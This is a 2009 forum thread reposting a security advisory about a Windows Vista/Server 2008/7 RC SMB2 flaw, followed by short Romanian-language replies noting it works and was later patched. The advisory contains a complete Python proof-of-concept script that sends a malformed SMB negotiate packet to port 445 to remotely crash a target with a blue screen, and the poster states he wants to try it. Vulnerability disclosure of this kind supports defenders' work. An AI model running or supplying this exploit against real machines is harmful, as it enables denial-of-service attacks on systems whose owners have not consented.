hirosima Posted September 13, 2009 Report Posted September 13, 2009 =============================================- Release date: September 7th, 2009- Discovered by: Laurent Gaffié- Severity: High=============================================I. VULNERABILITY-------------------------Windows Vista, Server 2008 < R2, 7 RC :SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.II. BACKGROUND-------------------------Windows vista and newer Windows comes with a new SMB version named SMB2.See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0for more details.III. DESCRIPTION-------------------------[Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS patch, for another SMB2.0 security issue:KB942624 (MS07-063)Installing only this specific update on Vista SP0 create the following issue:SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication.IV. PROOF OF CONCEPT-------------------------Smb-Bsod.py:#!/usr/bin/python#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field#it dies with a PAGE_FAULT_IN_NONPAGED_AREA errorfrom socket import sockethost = "IP_ADDR", 445buff = ("\x00\x00\x00\x90" # Begin SMB header: Session message"\xff\x53\x4d\x42" # Server Component: SMB"\x72\x00\x00\x00" # Negociate Protocol"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853"\x00\x26"# Process ID High: --> normal value should be "\x00\x00""\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe""\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54""\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31""\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00""\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57""\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61""\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c""\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c""\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e""\x30\x30\x32\x00")s = socket()s.connect(host)s.send(buff)s.close()V. BUSINESS IMPACT-------------------------An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.Windows Xp, 2k, are NOT affected as they dont have this driver.VI. SYSTEMS AFFECTED-------------------------[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.VII. SOLUTION-------------------------No patch available for the moment.Close SMB feature and ports, until a patch is provided.Configure your firewall properlyYou can also follow the MS Workaround:http://www.microsoft.com/technet/security/advisory/975497.mspxVIII. REFERENCES-------------------------http://www.microsoft.com/technet/security/advisory/975497.mspxhttp://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspxIX. CREDITS-------------------------This vulnerability has been discovered by Laurent GaffiéLaurent.gaffie{remove-this}(at)gmail.comX. REVISION HISTORY-------------------------September 7th, 2009: Initial releaseSeptember 11th, 2009: Revision 1.0 releaseXI. LEGAL NOTICES-------------------------The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.I accept no responsibility for any damage caused by the use ormisuse of this information.XII.Personal Notes-------------------------Many persons have suggested to update this advisory for RCE and not BSOD:It wont be done, if they find a way to execute code, they will publish them advisory.# milw0rm.com [2009-09-09]vreau sa il probez sa vad daca intradevar merge... Quote
chr(0) Posted September 13, 2009 Report Posted September 13, 2009 si ce rezultat ai avut?logic ca merge,nu a fost publicat de flori de mar,au fost postate informatii si pe microsoft Quote
Cheater Posted September 14, 2009 Report Posted September 14, 2009 A fost patchuit de cateva sapt prin windows update;) Quote